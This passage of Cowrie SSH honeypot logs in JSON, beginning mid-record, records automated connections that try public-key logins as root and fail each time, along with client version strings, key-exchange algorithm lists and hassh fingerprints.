b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T16:34:42.245922Z","src_ip":"212.227.125.160","session":"acc46f70585e"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T16:34:43.368042Z","src_ip":"212.227.125.160","session":"acc46f70585e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:34:43.370211Z","src_ip":"212.227.125.160","session":"acc46f70585e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57232,"dst_ip":"1.2.3.4","dst_port":22,"session":"455180e08bc4","protocol":"ssh","message":"New connection: 212.227.235.229:57232 (1.2.3.4:22) [session: 455180e08bc4]","sensor":"my-vps","timestamp":"2025-08-28T16:36:09.546700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:09.547639Z","src_ip":"212.227.235.229","session":"455180e08bc4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:09.691853Z","src_ip":"212.227.235.229","session":"455180e08bc4"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:09.982841Z","src_ip":"212.227.235.229","session":"455180e08bc4"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:09.983595Z","src_ip":"212.227.235.229","session":"455180e08bc4"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"e9:45:a2:1a:37:f3:2e:c2:35:c7:c7:e4:8a:0f:45:7a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMtPQsyaqw+aw2IVa/8L11Jo5cY+yQs6PVsZ52P1EsjCUO1W6i4Ck/VnmYZQNf7HphdMkf/5vhwy5XE9gLWlLJBT30KQZzaZvHWfy7Bnpy5EMgeFIqGhYy/4H7r33MPKTzhlmezdn7AlipkrP8Kb/l5NBWLLB1ZNa8TTYI9T1tYRzm+gW1+uVpNuz6WYf+iY7ZcTqlivARqQLBbwK4CoXiWDe395gXJHySnH+Tri5g8LU+M+mnWaRVfieJ0F1+/niQ7e4Vdp4Fo+fxHWTx6+wElYK7GFKytI1cMlOTZTU3DB84de8dLVynaxCv7BzwaFkPL+Ar5sx9LoCHRU0WCi6czVdOg3OaxUrkxP0S/t79AhVaIAsR+I5IvStVI8SIlUQL9RlaKcvqje2z9etRxHYNM8TDUivjcHHGPQOSJROG0VPUMNAHR5EJAZKbMq7DLpXsO8+4nvGQJMuNuMWcU8MMTcLJwfKEQyHaJYXRKq8v8FkJHuL7wi5wxx4E1UFRSGc=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint e9:45:a2:1a:37:f3:2e:c2:35:c7:c7:e4:8a:0f:45:7a","sensor":"my-vps","timestamp":"2025-08-28T16:36:10.128794Z","src_ip":"212.227.235.229","session":"455180e08bc4"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"e9:45:a2:1a:37:f3:2e:c2:35:c7:c7:e4:8a:0f:45:7a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMtPQsyaqw+aw2IVa/8L11Jo5cY+yQs6PVsZ52P1EsjCUO1W6i4Ck/VnmYZQNf7HphdMkf/5vhwy5XE9gLWlLJBT30KQZzaZvHWfy7Bnpy5EMgeFIqGhYy/4H7r33MPKTzhlmezdn7AlipkrP8Kb/l5NBWLLB1ZNa8TTYI9T1tYRzm+gW1+uVpNuz6WYf+iY7ZcTqlivARqQLBbwK4CoXiWDe395gXJHySnH+Tri5g8LU+M+mnWaRVfieJ0F1+/niQ7e4Vdp4Fo+fxHWTx6+wElYK7GFKytI1cMlOTZTU3DB84de8dLVynaxCv7BzwaFkPL+Ar5sx9LoCHRU0WCi6czVdOg3OaxUrkxP0S/t79AhVaIAsR+I5IvStVI8SIlUQL9RlaKcvqje2z9etRxHYNM8TDUivjcHHGPQOSJROG0VPUMNAHR5EJAZKbMq7DLpXsO8+4nvGQJMuNuMWcU8MMTcLJwfKEQyHaJYXRKq8v8FkJHuL7wi5wxx4E1UFRSGc=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:10.129740Z","src_ip":"212.227.235.229","session":"455180e08bc4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:10.274798Z","src_ip":"212.227.235.229","session":"455180e08bc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57246,"dst_ip":"1.2.3.4","dst_port":22,"session":"2116dda814f5","protocol":"ssh","message":"New connection: 212.227.235.229:57246 (1.2.3.4:22) [session: 2116dda814f5]","sensor":"my-vps","timestamp":"2025-08-28T16:36:10.419297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:10.420286Z","src_ip":"212.227.235.229","session":"2116dda814f5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:10.565676Z","src_ip":"212.227.235.229","session":"2116dda814f5"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:10.861876Z","src_ip":"212.227.235.229","session":"2116dda814f5"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:10.862529Z","src_ip":"212.227.235.229","session":"2116dda814f5"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW7bXyg1qQpzOijaWpT4imh4D+QDKShGZC9kfFky7MUxoTbyVFCSQ/+GMCCTYUCrLMG0852BT7EloDtDArsS5ZlLB2Q7d0W7gIlruI8DcC16mjo3+fHlydYrPuf/0abkps3R2moIbCtK7iwESSida4WZ6ceEri+4av1fyovfJsCvqzFZtvmNYmoggOViSmcId2F5sq9yZkcqkVt0tIE6KMvlFev8Cy2/JBLhy9brR0OygiNZgo/CovwsV949zXkJlV3cUqIjnBn+IS2bLKe9ncOsSP85cY+adaSchhb66Lej+sfNTIJQOo1nyXyvWSmGne4vnVeKQDewA6T3LjaRMRu5ZAaZaajawcPoyhJT1B8BIzC/+kwgPd2Mnl7Ppx5vBaCpBCMCEjo+eOXfkI8YdIZG67T4aD0bKOumGsYtDi4gRrKL2H8UV47A+adK7pjvxh9IvpXIq3Fo+SPaFDY3NugaGAQQXsSjWb0H5MLKS4x0C1vEnvaQ42tQ503pbi3RM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","sensor":"my-vps","timestamp":"2025-08-28T16:36:11.008763Z","src_ip":"212.227.235.229","session":"2116dda814f5"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW7bXyg1qQpzOijaWpT4imh4D+QDKShGZC9kfFky7MUxoTbyVFCSQ/+GMCCTYUCrLMG0852BT7EloDtDArsS5ZlLB2Q7d0W7gIlruI8DcC16mjo3+fHlydYrPuf/0abkps3R2moIbCtK7iwESSida4WZ6ceEri+4av1fyovfJsCvqzFZtvmNYmoggOViSmcId2F5sq9yZkcqkVt0tIE6KMvlFev8Cy2/JBLhy9brR0OygiNZgo/CovwsV949zXkJlV3cUqIjnBn+IS2bLKe9ncOsSP85cY+adaSchhb66Lej+sfNTIJQOo1nyXyvWSmGne4vnVeKQDewA6T3LjaRMRu5ZAaZaajawcPoyhJT1B8BIzC/+kwgPd2Mnl7Ppx5vBaCpBCMCEjo+eOXfkI8YdIZG67T4aD0bKOumGsYtDi4gRrKL2H8UV47A+adK7pjvxh9IvpXIq3Fo+SPaFDY3NugaGAQQXsSjWb0H5MLKS4x0C1vEnvaQ42tQ503pbi3RM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:11.009397Z","src_ip":"212.227.235.229","session":"2116dda814f5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:11.155594Z","src_ip":"212.227.235.229","session":"2116dda814f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57262,"dst_ip":"1.2.3.4","dst_port":22,"session":"62fa58c08870","protocol":"ssh","message":"New connection: 212.227.235.229:57262 (1.2.3.4:22) [session: 62fa58c08870]","sensor":"my-vps","timestamp":"2025-08-28T16:36:11.307471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:11.309183Z","src_ip":"212.227.235.229","session":"62fa58c08870"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:11.461624Z","src_ip":"212.227.235.229","session":"62fa58c08870"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:11.768288Z","src_ip":"212.227.235.229","session":"62fa58c08870"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:11.768901Z","src_ip":"212.227.235.229","session":"62fa58c08870"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","sensor":"my-vps","timestamp":"2025-08-28T16:36:11.924941Z","src_ip":"212.227.235.229","session":"62fa58c08870"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:11.925580Z","src_ip":"212.227.235.229","session":"62fa58c08870"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:12.079044Z","src_ip":"212.227.235.229","session":"62fa58c08870"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57272,"dst_ip":"1.2.3.4","dst_port":22,"session":"70bd23bfea30","protocol":"ssh","message":"New connection: 212.227.235.229:57272 (1.2.3.4:22) [session: 70bd23bfea30]","sensor":"my-vps","timestamp":"2025-08-28T16:36:12.229020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:12.229877Z","src_ip":"212.227.235.229","session":"70bd23bfea30"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:12.381309Z","src_ip":"212.227.235.229","session":"70bd23bfea30"}
